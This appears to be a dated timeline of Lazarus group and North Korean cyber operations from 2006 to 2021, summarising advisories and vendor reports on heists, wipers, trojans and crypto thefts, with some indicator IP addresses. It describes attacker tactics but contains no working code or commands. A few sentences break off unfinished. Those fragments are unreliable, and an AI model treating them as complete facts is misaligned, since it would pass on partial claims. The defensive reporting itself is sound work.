Lazarus Malware, TTPs, and Evolution


2006 - 2013

INTERPOL’s Supernote Summit wherein they decide to change the bill.

  • Date:: 2006-07-26
  • Reported to be manufactured in North Korea, the Supernote is a high-quality counterfeit of the 50-dollar and 100-dollar note, also known as a Superdollar. The notes are produced using similar processes and materials as genuine US currency.
  • First detected back in 1989, over $50M have been found as of 2006.
  • https://govinfo.gov/content/pkg/CHRG-109shrg28241/pdf/CHRG-109shrg28241.pdf

Operation Flame Malware

  • Date:: 2007-07-03

MYDOOM Malware and Dozer Malware - DDoS Attacks

  • Date:: 2009-07-04
  • A large scale DDoS attack on US and South Korean websites uses the MYDOOM and Dozer malware, which is suspected to have arrived in email messages. The malware places the text “Memory of Independence Day” in the Master Boot Record (MBR).

Operation Troy DDoS Attacks

Ten Days of Rain Attacks

  • Date:: 2011-03
  • “Ten Days of Rain” attack targets South Korean media, financial, and critical infrastructure targets. Compromised computers within South Korea are used to launch DDoS attacks.

Nonghyup Bank DDoS Attacks

  • Date:: 2011-04

DarkSeoul Wiper Attacks

  • Date:: 2013-03-20
  • DarkSeoul: a wiper attack that targeted three South Korean broadcast companies, financial institutes, and an ISP
  • At the time, two other groups going by the personas "NewRomanic Cyber Army Team" and "WhoIs Team" took credit for that attack

2014

Sony Pictures Hack Wiper Attack Occurs

  • Date:: 2014-11-24
  • The target was Sony Pictures Entertainment (“SPE”) and its comedic film “The Interview,” which depicted a fictional Kim Jong-Un, the Chairman of the Workers’ Party of Korea and the “supreme leader” of North Korea
  • Lazarus targeted individuals and entities associated with the production of “The Interview” and employees of SPE, sending them malware that the subjects used to gain unauthorized access to Sony's network
  • Once inside Sony's network, the subjects stole movies and other confidential information, and then effectively rendered thousands of computers inoperable
  • The same group of subjects also targeted individuals associated with the release of “The Interview,” among other victims.
  • Perpetrators identified themselves as the Guardians of Peace.
  • Large amounts of data were stolen and slowly leaked in the days following the attack.
  • U.S. investigators say the culprits spent at least two months copying critical files
  • The attack was conducted using malware. Server Message Block Worm Tool to conduct attacks
  • Components of the attack included a listening implant, backdoor, proxy tool, destructive hard drive tool, and destructive target cleaning tool
  • The components clearly suggest an intent to gain repeated entry, extract information, and be destructive, as well as remove evidence of the attack
  • November 24, 2014 - previously installed malware rendered many Sony employees' computers inoperable, displaying a warning from a group calling themselves the Guardians of Peace along with a portion of the confidential data taken during the hack.
  • Several Sony-related Twitter accounts were also taken over
  • Park was a North Korean hacker who worked for the country's Reconnaissance General Bureau, the equivalent of the
  • The US DOJ also asserted that Park was partially responsible for arranging WannaCry, having developed part of the ransomware software
  • https://en.wikipedia.org/wiki/Sony_Pictures_hack
  • https://fbi.gov/news/pressrel/press-releases/update-on-sony-investigation

Operation Red Dot against South Korean Govt/Defence Co's

  • Date:: 2014-2015
  • Variants of the malware used in the Sony Pictures hack were found in attacks which targeted the websites of North Korean research and governmental organizations, and the South Korean defence industry.
  • AhnLab refers to these attacks – which occurred from 2014 to 2015 – as Operation Red Dot. The variants in this operation share similar code and names, such as AdobeArm.exe and msnconf.exe.
  • The main infection methods are: executable files disguised as document files (HWP, PDF), disguised installers, and exploits of Hangul Word Processor (HWP) file vulnerabilities.
  • The document files, which are listed in Table 3, are decoys disguised as legitimate documents, such as address books, deposit slips and invitations to lure victims into opening them.
  • https://virusbulletin.com/virusbulletin/2018/11/vb2018-paper-hacking-sony-pictures/

2015

Banco del Austro in Ecuador SWIFT Bank Heist - $12M

KIMSUKY - South Korea blames North Korea for December hack on nuclear operator

Bangladesh Bank Employees spear-phished

  • Date:: 2015-03-30
  • By March the hackers had a backdoor into the bank's electronic communication system, allowing them to send messages to one another in a way that mimicked the bank’s encrypted-communication protocols and did not alert security to their presence.

SWIFT Heists

  • Date:: 2015-2019
  • Attempts from 2015 through 2019 to steal more than $1.2 billion from banks in Vietnam, Bangladesh, Taiwan, Mexico, Malta, and Africa by hacking the banks’ computer networks and sending fraudulent SWIFT messages.

Sony Pictures Hack - Intrusion into Mammoth Screen, producer of a fictional series involving a British nuclear scientist taken prisoner in DPRK


2016

Sony Pictures Hack Report Released: Operation Blockbuster

Bangladesh Bank SWIFT Heist Initiated - $81M

Engaged in computer intrusions and cyber-heists at many financial services victims in the United States, and in other countries in Europe, Asia, Africa, North America, and South America in 2015, 2016, 2017, and 2018, with attempted losses well over $1 billion.

  • Date:: 2015-2018

BAE Systems Threat Research Blog: Cyber Heist Attribution

FASTCash - $16M was withdrawn from roughly 1700 7-Eleven ATMs across Japan using data stolen from South Africa’s Standard Bank

  • Date:: 2016-05-14

Tien Phong Bank in Vietnam SWIFT Heist - $1M

SWIFT Heists: Symantec has found evidence that a bank in the Philippines has also been attacked by the group that stole US$81 million from the Bangladesh central bank

SWIFT Heists: Evidence of Stronger Ties Between North Korea and SWIFT Banking Attacks

Operation Daybreak

Multiple spear-phishing campaigns targeting employees of US defense contractors, energy companies, aerospace companies, technology companies, the U.S. Department of State, and the U.S. Department of Defense

Stole more than 200GB of South Korean Army data

  • Date:: 2016
  • The stolen data included documents known as Operational Plan 5015—a detailed analysis of how a war with the country’s northern neighbor might proceed, and, notably, a plot to “decapitate” North Korea by assassinating Kim Jong Un. The breach was so egregious that Kim Tae-woo, a former president of the Korea Institute for National Unification, a think tank in Seoul, told the Financial Times, “Part of my mind hopes the South Korean military intentionally leaked the classified documents to the North with the intention of having a second strategy.”

2017

Lazarus Under The Hood

  • Date:: 2017-04-03
  • Lazarus is not just another APT actor. The scale of the Lazarus operations is shocking. It has been on a spike since 2011.
  • All those hundreds of samples that were collected give the impression that Lazarus is operating a factory of malware, which produces new samples via multiple independent conveyors.
  • We have seen them using various code obfuscation techniques, rewriting their own algorithms, applying commercial software protectors, and using their own and underground packers.
  • Lazarus knows the value of quality code, which is why we normally see rudimentary backdoors being pushed during the first stage of infection. Burning those doesn’t impact the group too much. However, if the first stage backdoor reports an interesting infection they start deploying more advanced code, carefully protecting it from accidental detection on disk. The code is wrapped into a DLL loader or stored in an encrypted container, or maybe hidden in a binary encrypted registry value. It usually comes with an installer that only attackers can use, because they password protect it. It guarantees that automated systems – be it a public sandbox or a researcher’s environment – will never see the real payload.
  • Most of the tools are designed to be disposable material that will be replaced with a new generation as soon as they are burnt. And then there will be newer, and newer, and newer versions. Lazarus avoids reusing the same tools, same code, and the same algorithms. “Keep morphing!” seems to be their internal motto.
  • Those rare cases when they are caught with same tools are operational mistakes, because the group seems to be so large that one part doesn’t always know what the other is doing.
  • https://securelist.com/lazarus-under-the-hood/77908/
  • https://csoonline.com/article/560979/kaspersky-lab-reveals-direct-link-between-banking-heist-hackers-and-north-korea.html

WannaCry

Lazarus Arisen

  • Date:: 2017-05-30
  • https://group-ib.com/blog/lazarus/
  • 210.52.109.22 - China Netcom, 210.52.109.0/24 is assigned to North Korea
  • 175.45.178.222 - National Defence Commission
  • 175.45.178.19 - Ghost RAT
  • 175.45.178.97 - Ghost RAT

Four wallets on Yapizon, a South Korean cryptocurrency exchange, are compromised. (It is worth noting that at least some of the tactics, techniques, and procedures reportedly employed during this compromise were different from those observed in subsequent intrusion attempts, and as of yet there are no clear indications of North Korean involvement.)

  • Date:: 2017-04-22

The United States announces a strategy of increased economic sanctions against North Korea. Sanctions from the international community could be driving North Korean interest in cryptocurrency, as discussed earlier.

  • Date:: 2017-04-26

Spearphishing against South Korean Exchange #1 begins.

  • Date:: 2017-05-01

South Korean Exchange #2 compromised via spearphish.

  • Date:: 2017-05-30

More suspected North Korean activity targeting unknown victims, believed to be cryptocurrency service providers in South Korea.

  • Date:: 2017-06-01

CISA: Report on HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure

  • Date:: 2017-06-13
  • This Joint Technical Alert provides technical details on the tools and infrastructure used by cyber actors of the North Korean government to target the media, aerospace, financial, and critical infrastructure sectors in the United States and globally. Working with U.S. government partners, DHS and FBI identified Internet Protocol addresses associated with a malware variant, known as DeltaCharlie, used to manage North Korea’s DDoS botnet infrastructure.
  • https://us-cert.gov/ncas/alerts/TA17-164A

South Korean Exchange #3 targeted via spear phishing to personal account.

  • Date:: 2017-07-01

Why Is North Korea So Interested in Bitcoin?

Unit42 has discovered an ongoing attack targeting individuals involved with US defense contracts that links back to the perpetrators of the Sony Pictures Hack.

CISA's analysis of DeltaCharlie Attack Malware

  • Date:: 2017-08-23
  • STIX file for MAR 10132963. This MAR examines the functionality of the DeltaCharlie malware variant to manage North Korea’s distributed denial-of-service (DDOS) botnet infrastructure (refer to TA17-164A). DHS distributed this MAR to enable network defense and reduce exposure to any North Korean government malicious cyber activity.

The World Once Laughed at North Korean Cyberpower. No More.

CISA's analysis of FALLCHILL and Volgmer

  • Date:: 2017-11-14
  • CISA Alert TA17-318A: HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL
  • CISA Alert TA17-318B: HIDDEN COBRA – North Korean Trojan: Volgmer
  • These Joint Technical Alerts provide information and IOCs on malware variants used by the North Korean government to maintain a presence on victims’ networks and to further network exploitation. DHS and FBI distributed these alerts to enable network defense and reduce exposure to any North Korean government malicious cyber activity.

North Korea suspected in latest bitcoin heist, bankrupting Youbit exchange

CISA's analysis of North Korean Trojan: BANKSHOT

  • Date:: 2017-12-21
  • STIX file for MAR 10135536
  • DHS and FBI identified a Trojan malware variant—referred to as BANKSHOT—used by the North Korean government. This MAR analyzes three malicious executable files.
  • Two files are 32-bit Windows executables that function as Proxy servers and implement a Fake TLS method.
  • The third file is an Executable and Linkable Format (ELF) file designed to run on Android platforms as a fully functioning Remote Access Trojan.

2018

TrendMicro's KillDisk Variant Hits Latin American Financial Groups

Korea In The Crosshairs

North Korea Bitten by Bitcoin Bug: Financially motivated campaigns reveal new dimension of the Lazarus Group

  • Date:: 2018-01-29
  • https://proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug-180129.pdf
  • PowerRatankba, Gh0st RAT, RatankbaPOS

North Korea stole huge amount of virtual currency: South Korea spy agency

CISA's analysis of North Korean Trojan: HARDRAIN

  • Date:: 2018-02-13
  • AR 10135536-F: North Korean Trojan: HARDRAIN
  • STIX file for MAR 10135536-F
  • DHS and FBI identified a Trojan malware variant—referred to as HARDRAIN—used by the North Korean government.

Reaper - The Overlooked North Korean Actor from FireEye

CISA's analysis of North Korean Trojan: SHARPKNOT

  • Date:: 2018-03-28
  • MAR 10135536.11: North Korean Trojan: SHARPKNOT
  • STIX file for MAR 10135536.11
  • DHS and FBI identified a Trojan malware variant—referred to as SHARPKNOT—used by the North Korean government. SHARPKNOT is a 32-bit Windows executable file. When executed from the command line, the malware overwrites the Master Boot Record and deletes files on the local system, any mapped network shares, and physically connected storage devices.

Lazarus KillDisks Central American casino

  • Date:: 2018-04-03
  • https://welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/
  • Our analysis shows that the cybercriminals behind the attack against an online casino in Central America, and several other targets in late-2017, were most likely the infamous Lazarus hacking group. In all of these incidents the attackers utilized similar toolsets, including KillDisk; the disk-wiping tool that was executed on compromised machines.
  • Some of the past attacks attributed to the Lazarus Group attracted the interest of security researchers who relied on Novetta et al’s white papers, with hundreds of pages describing the tools used in the attacks – the Polish and Mexican banks; the WannaCryptor outbreak; phishing campaigns against US defense contractors, etc – which provide grounds for the attribution of these attacks to the Lazarus Group.
  • Our analysis of these two Win32/KillDisk.NBO variants revealed that they share many code similarities. Further, they are almost identical to the KillDisk variant used against financial organizations in Latin America, as described by Trend Micro.
  • One of the variants was protected using the commercial PE protector VMProtect in its 3rd generation, which made unpacking it trickier. The attackers most likely did not buy a VMProtect license but have rather used leaked or pirated copies available on the Internet. Using protectors is common for the Lazarus group: during the Polish and Mexican attacks in February 2017, they made use of Enigma Protector and some of the Operation Blockbuster samples, reported by Palo Alto Networks, used an older version of VMProtect.
  • This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack (we didn’t see these exact samples anywhere else). The attack itself was very complex, consisted of several steps, and involved tens of protected tools that, being stand-alone, would reveal little from their dynamics.
  • Utilizing KillDisk in the attack scenario most likely served one of two purposes: the attackers covering their tracks after an espionage operation, or it was used directly for extortion or cyber-sabotage. In any case, the fact that ESET products detected the malware on over 100 endpoints and servers in the organization signifies a large-scale effort of the attackers.

SWIFT is aware of a malware that aims to reduce financial institutions’ abilities to evidence fraudulent transactions on their local systems. Contrary to reports that suggest otherwise, this malware has no impact on SWIFT’s network or core messaging services.

CISA's analysis of HIDDEN COBRA – Joanap Backdoor Trojan and Brambul Server Message Block Worm

  • Date:: 2018-05-29
  • CISA Alert TA18-149A: HIDDEN COBRA – Joanap Backdoor Trojan and Brambul Server Message Block Worm
  • MAR 10135536-3: HIDDEN COBRA RAT/Worm
  • This Joint Technical Alert and MAR authored by DHS and FBI provides information, including IOCs associated with two families of malware used by the North Korean government: A remote access tool, commonly known as Joanap; and Server Message Block worm, commonly known as Brambul.

NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea

Banco de Chile Wiper Attack Just a Cover for $10M SWIFT Heist

CISA's analysis of North Korean Trojan: TYPEFRAME

  • Date:: 2018-06-14
  • AR 10135536-12
  • DHS and FBI identified a Trojan malware variant—referred to as TYPEFRAME—used by the North Korean government. DHS and FBI distributed this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity. This malware report contains an analysis of multiple malware samples consisting of 32-bit and 64-bit Windows executable files and a malicious Microsoft Word document that contains Visual Basic for Applications macros.

New Andariel Reconnaissance Tactics Uncovered

  • Date:: 2018-07-16
  • https://trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html
  • Andariel has been quite active these past few months. According to South Korean security researchers IssueMakersLab, the group used an ActiveX zero-day exploit for watering hole attacks on South Korean websites last May—they called this “Operation GoldenAxe”. But more recently on June 21, we noticed that Andariel injected their script into four other compromised South Korean websites for reconnaissance purposes.

CISA's analysis of North Korean Trojan: KEYMARBLE

  • Date:: 2018-08-09
  • AR 10135536-17
  • DHS and FBI identified a Trojan malware variant—referred to as KEYMARBLE—used by the North Korean government. KEYMARBLE is a RAT capable of accessing device configuration data, downloading additional files, executing commands, modifying the registry, capturing screen shots, and exfiltrating data.

DOJ’s Criminal Complaint of a North Korean Regime-Backed Programmer Jin Hyok Park

The most destructive cyber threat right now

FireEye: Report on APT38

NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT

CISA's analysis of HIDDEN COBRA FASTCash Campaign

Mandiant: APT38 - Details on New North Korean Regime-Backed Threat Group

Recorded Future: Lazarus Group Shifting Patterns in Internet Use Reveal Adaptable and Innovative North Korean Ruling Elite

Cryptocurrency businesses targeted by Lazarus via custom PowerShell Scripts

KIMSUKY - Stolen Pencil Campaign

Top secret report: North Korea keeps busting sanctions, evading U.S.-led sea patrols

Group-IB: 2018 Crime Report

According to the Treasury, NK affiliated hackers “likely” stole ~$571 million in cryptocurrency from five Asian exchanges in 2017 and 2018.

  • 2018-09: Indonesian Crypto Company Theft - $24.9M
  • 2018-06: Bithumb2 CEX Hack - Lazarus - $30M
  • 2017-12: YouBit CEX Hack (previously known as Yapizon)
  • 2017-04: Yapizon CEX Hack - 3831 BTC

Multiple malicious cryptocurrency applications which would provide the North Korean hackers a backdoor into the victims’ computers.

  • Date:: March 2018 through at least September 2020
  • Celas Trade Pro, WorldBit-Bot, iCryptoFx, Union Crypto Trader, Kupay Wallet, CoinGo Trade, Dorusio, CryptoNeuro Trader, and Ants2Whale

FASTCash grabs $6.1 million from BankIslami Pakistan Limited

Operation AppleJeus research highlighted Lazarus’s focus on cryptocurrency exchanges utilizing a fake company with a backdoored product aimed at cryptocurrency businesses

  • Date:: 2018
  • New ability to target macOS.
  • Victims were infected after installing a legitimate-looking trading application called Celas Trade Pro from Celas Limited; the application showed no signs of malicious behaviour and looked genuine. The malware was delivered via the app's update files. Users installed the program via a download link delivered over email.
  • For macOS users, Celas LLC also provided a native version of its trading app. A hidden “autoupdater” module is installed in the background to start immediately after installation, and after each system reboot.
  • https://securelist.com/operation-applejeus/87553/

2019

Two Hundred North Korean hacker organizations dispatched overseas, each team sending up to $1 million to North Korea

KIMSUKY - Operation Kabar Cobra

KIMSUKY - Operation Smoke Screen

North Korea's Next Weapon of Choice: Cyber

ScarCruft continues to evolve, introduces Bluetooth harvester

JPCERT: Spear Phishing against Cryptocurrency Businesses

  • Date:: 2019-07-09
  • https://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html
  • The zip file downloaded from the URL in the email contains a password-protected decoy document and a shortcut file “Password.txt.lnk”. This shortcut file contains some commands, and they run when the file is executed. The below image illustrates the flow of events from the shortcut file being executed until the VBScript-based downloader is launched.
  • CryptoCore

CISA's analysis of North Korean Malware ELECTRICFISH and BADCALL

  • Date:: 2019-09-09
  • MAR 10135536-21: North Korean Proxy Malware: ELECTRICFISH. Note: this version of the ELECTRICFISH MAR updates the May 9, 2019 version.
  • MAR 10135536-10: North Korean Trojan: BADCALL. Note: this version of the BADCALL MAR updates the February 6, 2018 version, and STIX file.
  • CISA, FBI, and DoD identified multiple malware variants used by the North Korean government.
  • ELECTRICFISH implements a custom protocol that allows traffic to be tunneled between a source and a destination Internet Protocol (IP) address.
  • BADCALL malware is an executable that functions as a proxy server and implements a Fake TLS method.

Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups

Indian Nuclear Power Plant Attack

  • Date:: 2019-10-29
  • https://greatgameindia.com/kudankulam-nuclear-power-plant-hit-by-cyberattack/
  • Kaspersky Global Research and Analysis Team have discovered a previously unknown spy tool, which had been spotted in Indian financial institutions and research centers. Called Dtrack, this spyware reportedly was created by the Lazarus group and is being used to upload and download files to victims’ systems, record key strokes and conduct other actions typical of a malicious remote administration tool (RAT).
  • In 2018, Kaspersky researchers discovered ATMDtrack – malware created to infiltrate Indian ATMs and steal customer card data. Following further investigation using the Kaspersky Attribution Engine and other tools, the researchers found more than 180 new malware samples that had code sequence similarities with the ATMDtrack, but at the same time were not aimed at ATMs. Instead, its list of functions defined it as spy tools, now known as Dtrack.
  • Moreover, not only did the two strains share similarities with each other, but also with the 2013 DarkSeoul campaign, which was attributed to Lazarus – an infamous advanced persistence threat actor responsible for multiple cyberespionage and cyber sabotage operations.

Indian Nuclear Power Plant Attack: “We have long known and continuously monitored North Korea is attacking India”

New Lazarus Malware: macOS Threat Served from Cryptocurrency Trading Platform


2020

CISA's analysis of North Korean Trojans BISTROMATH, SLICKSHOES, CROWDEDFLOUNDER, HOTCROISSANT, ARTFULPIE, BUFFETLINE, HOPLIGHT

  • Date:: 2020-02-14
  • Note: this version of HOPLIGHT MAR updates the October 31, 2019 version, which updated April 10, 2019 version.
  • The BISTROMATH report examines multiple versions of a full-featured Remote Access Trojan implant executable and multiple versions of the CAgent11 GUI implant controller/builder.
  • SLICKSHOES is a Themida-packed dropper that decodes and drops a Themida-packed beaconing implant.
  • The CROWDEDFLOUNDER report examines a Themida-packed Windows executable.
  • HOTCROISSANT is a full-featured beaconing implant.
  • ARTFULPIE is an implant that performs downloading and in-memory loading and execution of a DLL from a hardcoded URL.
  • BUFFETLINE is a full-featured beaconing implant.
  • The HOPLIGHT report examines multiple malicious executable files, some of which are proxy applications that mask traffic between the malware and the remote operators.

Treasury Sanctions Individuals Laundering Cryptocurrency for Lazarus Group

How an elaborate North Korean crypto hacking heist fell apart

UNC2891 Have Your Cake and Eat it Too? An Overview of UNC2891

  • Date:: 2020-03-16
  • https://mandiant.com/resources/unc2891-overview
  • UNC2891 intrusions appear to be financially motivated and in some cases spanned several years through which the actor had remained largely undetected.
  • Mandiant discovered a previously unknown rootkit for Oracle Solaris systems that UNC2891 used to remain hidden in victim networks; we have named this CAKETAP.
  • Mandiant expects that UNC2891 will continue to capitalize on this and perform similar operations for financial gain that target mission critical systems running these operating systems.

U.S. Government Advisory: Guidance on the North Korean Cyber Threat

  • Date:: 2020-04-15
  • The U.S. Departments of State, Treasury, and Homeland Security and FBI issued this Advisory as a comprehensive resource on the North Korean cyber threat for the international community, network defenders, and the public. The Advisory highlights the cyber threat posed by North Korea and provides recommended steps to mitigate the threat.

CISA's Guidance on the North Korean Cyber Threat

CISA Alert on TraitorTrader

OXT's The North Korean Connection

CISA's analysis of North Korean Trojans: COPPERHEDGE, TAINTEDSCRIBE, PEBBLEDASH

  • Date:: 2020-05-12
  • MAR 1028834-1.v1: North Korean Remote Access Tool: COPPERHEDGE
  • MAR 1028834-2.v1: North Korean Trojan: TAINTEDSCRIBE
  • MAR 1028834-3.v1: North Korean Trojan: PEBBLEDASH
  • CISA, FBI, and DoD identified three malware variants used by the North Korean government.
  • COPPERHEDGE is a member of the Manuscrypt family of malware, which is used by APT cyber actors in the targeting of cryptocurrency exchanges and related entities. Manuscrypt is a
  • TAINTEDSCRIBE and PEBBLEDASH are full-featured beaconing implants.

U.S. Government Advisory: Top 10 Routinely Exploited Vulnerabilities

  • Date:: 2020-05-12
  • CISA, FBI, and the broader U.S. Government authored a Joint Alert with details on vulnerabilities routinely exploited by foreign cyber actors, including North Korean cyber actors.

USA Charges 28 North Koreans and 5 Chinese citizens with laundering more than $2.5 billion in assets to help fund North Korea’s nuclear weapons

ClearSky: CryptoCore - A Threat Actor Targeting Cryptocurrency Exchanges

  • Date:: 2020-06-01
  • https://clearskysec.com/wp-content/uploads/2020/06/CryptoCore_Group.pdf
  • CryptoCore, Dangerous Password, Leery Turtle
  • The group often uses Google Drive as the storage for its files, specifically the bait
  • Relatively heavy use of VBS files both as downloaders and as backdoors. What appears to be the main backdoor of the group is also a VBS file (tracked by Proofpoint Emerging Threats as CageyChameleon), rather than an executable or an in-memory payload.
  • LNK shortcuts as downloaders – we have seen the attackers hide LNK shortcuts behind icons and titles of other file types, mostly text files. Sometimes it could be a password file needed to open the main document, sometimes it could be the main document that is actually a shortcut, but LNK files are a staple for this group. These files are used to connect to the command and control (C2) server and download next-stage files.
  • .xyz TLD via NameCheap
  • The VBS created in %TEMP% acts as a downloader for another VBS. That VBS collects: Username, Host name, OS version, install date and run time, Time zone, CPU name, Execution path of the VBS in %TEMP%, Network adapter information, List of running processes. The information is sent to the C2 server every minute, and it expects additional VBS as a response.

VHD ransomware, Hakuna MATA

  • Date:: 2020-07-01
  • Initial access was achieved through opportunistic exploitation of a vulnerable VPN gateway. After that, the attackers obtained administrative privileges, deployed a backdoor on the compromised system and were able to take over the Active Directory server.
  • https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/

North Korean hackers are skimming US and European shoppers

U.S. seeks forfeiture of $2,372,793 for violations of sanctions against the DPRK

  • Date:: 2020-07-23
  • According to the complaint, the four companies laundered U.S. dollars on behalf of sanctioned North Korean banks and helped those banks to illegally access the U.S. financial market.
  • The complaint lists one source of the laundered funds as a DPRK entity involved in the banned sales of North Korean coal. The laundered funds were used to purchase Russian petroleum products and nuclear and missile components for the DPRK and to aid multiple covert branches of the DPRK’s Foreign Trade Bank, which the U.S. Treasury Department had sanctioned for “facilitating transactions on behalf of actors linked to the DPRK’s proliferation network”.
  • https://justice.gov/opa/pr/united-states-files-complaint-forfeit-more-237-million-companies-accused-laundering-funds

Yang Ban Corporation Pleads Guilty to Money Laundering

  • Date:: 2020-08-31
  • From at least February 2017 to May 2018 and beyond, Yang Ban deceived banks in the U.S. into processing transactions for North Korean customers of Yang Ban.
  • It used front companies and created false sets of invoices and shipping records to conceal that the ultimate destination of shipments were customers in the DPRK. These practices helped Yang Ban circumvent “banks’ sanction and anti-money laundering filters” thus “duping U.S. correspondent banks into processing U.S. dollar transactions that they would not otherwise have authorized.”
  • Yang Ban specifically admitted to conspiring with SINSMS (a company subsequently designated by U.S. sanctions) and others, “to conceal the North Korean nexus” by falsifying shipping records and by other means.
  • The company will pay a financial penalty totaling $673,714 (USD) and has “agreed to implement rigorous internal controls and to cooperate fully with the Justice Department, including by reporting any criminal conduct by an employee”.
  • https://justice.gov/opa/pr/company-pleads-guilty-money-laundering-violation-part-scheme-circumvent-north-korean
  • https://nknews.org/2020/09/company-pleads-guilty-to-helping-north-korea-illegally-use-us-banking-system

Operation Dream Job - Espionage Campaign Targeting Government and Defense Companies

  • Date:: 2020-08-13
  • Widespread North Korean Espionage Campaign
  • It succeeded in infecting several dozens of companies and organizations in Israel and globally
  • Main targets: defense, governmental companies, and specific employees of those companies
  • We assess this to be this year’s main offensive campaign by the Lazarus group
  • The infection and infiltration of target systems had been carried out through a widespread and sophisticated social engineering campaign, which included: reconnaissance, creation of fictitious LinkedIn profiles, sending emails to the targets’ personal addresses, and conducting a continuous dialogue with the target – directly on the phone, and over WhatsApp
  • Upon infection, the attackers collected intelligence regarding the company’s activity, and also its financial affairs, probably in order to try and steal some money from it
  • The double scenario of espionage and money theft is unique to North Korea, which operates intelligence units that steal both information and money for their country.
  • https://clearskysec.com/operation-dream-job/
  • https://clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf

CISA's analysis of North Korean Remote Access Trojan: BLINDINGCAN

  • Date:: 2020-08-19
  • CISA and FBI have identified a malware variant—referred to as BLINDINGCAN—used by North Korean actors. FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. A threat group with a nexus to North Korea targeted government contractors early this year to gather intelligence surrounding key military and energy technologies.

DPRK-aligned threat actor targeting cryptocurrency vertical with global hacking campaign

Lazarus Group Campaign Targeting the Cryptocurrency Vertical

CISA: Report FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks

  • Date:: 2020-08-26
  • MAR 10301706-1.v1: North Korean Remote Access Tool: ECCENTRICBANDWAGON
  • MAR 10301706-2.v1: North Korean Remote Access Tool: VIVACIOUSGIFT
  • MAR 10257062-1.v2: North Korean Remote Access Tool: FASTCASH for Windows
  • CISA, the Department of the Treasury, FBI, and U.S. Cyber Command released a joint Technical Alert and three MARs on the North Korean government’s ATM cash-out scheme—referred to by the U.S. Government as “FASTCash.”
  • https://cisa.gov/news-events/cybersecurity-advisories/aa20-239a

US DOJ: Forfeiture Complaint for 280 Crypto addresses tied to North Korea

Chainalysis: report regarding Lazarus Group on-chain activity and the recent US DOJ civil forfeiture of 280 cryptocurrency addresses

F-Secure: Report on Lazarus Group's targeting of crypto companies

US DOJ: Lazarus Group developed multiple malicious crypto applications from March 2018 through at least September 2020. Such apps include Celas Trade Pro, Worldbit-bot, icryptofx, Union Crypto Trader, Kupay Wallet, Coingo Trade, Dorusio, Cryptoneuro Trader, and Ants2whale.

  • Date:: 2020-09-20

Secret documents show how North Korea launders money through U.S. banks

Pharma Company Espionage Attacks (General Dynamics job-offer lures)

  • Date:: 2020-09
  • An employee of the pharmaceutical company received a document named GD2020090939393903.doc with a job offer (creation date: 2020:09:22 03:08:00).
  • After a short period of time, another employee received a document named GD20200909GAB31.doc with a job offer from the same company (creation date: 2020:09:14 07:50:00). By opening the documents from a potential employer, both victims activated malicious macros on their home computers
  • In one of the cases, a malicious document was received via Telegram. Note that both documents were received by the victims over the weekend.
  • At the same time, by performing reconnaissance on the computers available, the attackers received new vectors for penetration into the company's corporate network. So, two days later, after the company's network infrastructure was compromised, another employee from another branch received a job offer. On the social network LinkedIn, the victim was contacted by a user named Rob Wilson, shortly after which she received an email with a job offer from General Dynamics UK.
  • The compromised user also forwarded the malicious email to her colleague. However, the recipient did not open the malicious document and did not allow the attackers to expand the attack surface.
  • In this campaign, attackers, under the guise of the HR service of General Dynamics Mission Systems, sent documents with malicious macros containing a stub text with a job offer through LinkedIn Messages, Telegram, WhatsApp, and corporate email.

NTT Security: Unveiling The Cryptomimic

CISA: Report on North Korean Advanced Persistent Threat Focus: Kimsuky

  • Date:: 2020-10-27
  • CISA, FBI, and the U.S. Cyber Command Cyber National Mission Force (CNMF) released a new Joint Cybersecurity Advisory on TTPs used by North Korean APT group Kimsuky.

North Korean hackers targeted COVID vaccine maker AstraZeneca

OFAC Cyber-related Designations

Pharma Company Espionage Attacks

  • Date:: 2020
  • Stayed in the victims' systems for months on end
  • Initial contact in February 2020
  • Payload delivered in Q2/Q3 2020
  • Data exfiltration in Q2, Q3 and Q4 2020
  • By using spear-phishing methods, members of Lazarus Group acted as health officials and reached out to a number of pharmaceutical companies. Once trust was gained, Lazarus Group sent a number of malicious links to the companies. It is unconfirmed what the goal of the attack was, but it is suspected that they were looking to sell data for profit, extort the companies and their employees, and give foreign entities access to proprietary COVID-19 Research.
  • https://hvs-consulting.de/public/ThreatReport-Lazarus.pdf

2021

2021 Chainalysis Report: North Korean Hackers Crypto Holdings Reach All-time High

  • Date:: 2021-01-01
  • https://go.chainalysis.com/rs/503-FAP-074/images/Crypto-Crime-Report-2022.pdf
  • North Korean cybercriminals had a banner year in 2021, launching at least seven attacks on cryptocurrency platforms that extracted nearly $400M worth of digital assets last year.
  • These attacks targeted primarily investment firms and centralized exchanges, and made use of phishing lures, code exploits, malware, and advanced social engineering to siphon funds out of these organizations’ internet-connected “hot” wallets into DPRK-controlled addresses.
  • Once North Korea gained custody of the funds, they began a careful laundering process to cover up and cash out. These complex tactics and techniques have led many security researchers to characterize cyber actors for the Democratic People’s Republic of Korea (DPRK) as advanced persistent threats (APTs). This is especially true for APT 38, also known as “Lazarus Group,” which is led by DPRK’s primary intelligence agency, the US- and UN-sanctioned Reconnaissance General Bureau.
  • While we will refer to the attackers as North Korean-linked hackers more generally, many of these attacks were carried out by the Lazarus Group in particular. Lazarus Group first gained notoriety from its Sony Pictures and WannaCry cyberattacks, but it has since concentrated its efforts on cryptocurrency crime—a strategy that has proven immensely profitable.
  • From 2018 on, the group has stolen and laundered massive sums of virtual currencies every year, typically in excess of $200M. The most successful individual hacks, one on KuCoin and another on an unnamed cryptocurrency exchange, each netted more than $250M alone.
  • Interestingly, in terms of dollar value, Bitcoin now accounts for less than one fourth of the cryptocurrencies stolen by DPRK.
